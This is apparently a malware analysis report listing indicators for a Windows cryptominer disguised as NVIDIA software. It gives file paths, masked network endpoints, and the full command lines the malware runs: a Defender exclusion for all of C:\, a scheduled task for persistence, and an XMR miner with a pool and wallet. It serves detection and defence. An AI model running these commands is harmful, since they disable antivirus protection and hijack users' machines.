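Technical Information
The report's sub-headings are missing from this copy, so the list below runs together file-system paths, network endpoints and DNS queries, and the command lines of launched processes. Host names are partially masked with `##` as published. Entries worth checking first on a host are the Microsoft Defender exclusion added for all of C:\, the "Geforce Experience" scheduled task that runs every minute at the highest run level, and a process at the `<SYSTEM32>\svchost.exe` path started with mining-pool arguments.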
- <SYSTEM32>\tasks\geforce experience
- <SYSTEM32>\svchost.exe
- %ALLUSERSPROFILE%\nvidia\nvidia.exe
- 'ht##bin.org':80
- 'di##ord.com':443
- http://ht##bin.org/ip
- 'di##ord.com':443
- DNS ASK ht##bin.org
- DNS ASK di##ord.com
- '%ALLUSERSPROFILE%\nvidia\nvidia.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\ (with hidden window)
- '<SYSTEM32>\svchost.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 4AqHT2Azdn995DwtjYFAVeb348o9caxHjaLdmTjti2e9R59wALpgkun451k4PDiZSNSjoBJSybhe8AAhbQ3zAHnUJvAa4uN.darbinynks (with hidden window)
- '%ALLUSERSPROFILE%\nvidia\nvidia.exe' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "Geforce Experience" /rl HIGHEST /tr %ALLUSERSPROFILE%\Nvidia\nvidia.exe
- '<SYSTEM32>\svchost.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 4AqHT2Azdn995DwtjYFAVeb348o9caxHjaLdmTjti2e9R59wALpgkun451k4PDiZSNSjoBJSybhe8AAhbQ3zAHnUJvAa4uN.darbinynks
- '<SYSTEM32>\taskeng.exe' {3835FA8E-67A7-4BC7-9817-CD6CD33DBA87} S-1-5-21-1960123792-2022915161-3775307078-1001:hlavvezs\user:Interactive:[1]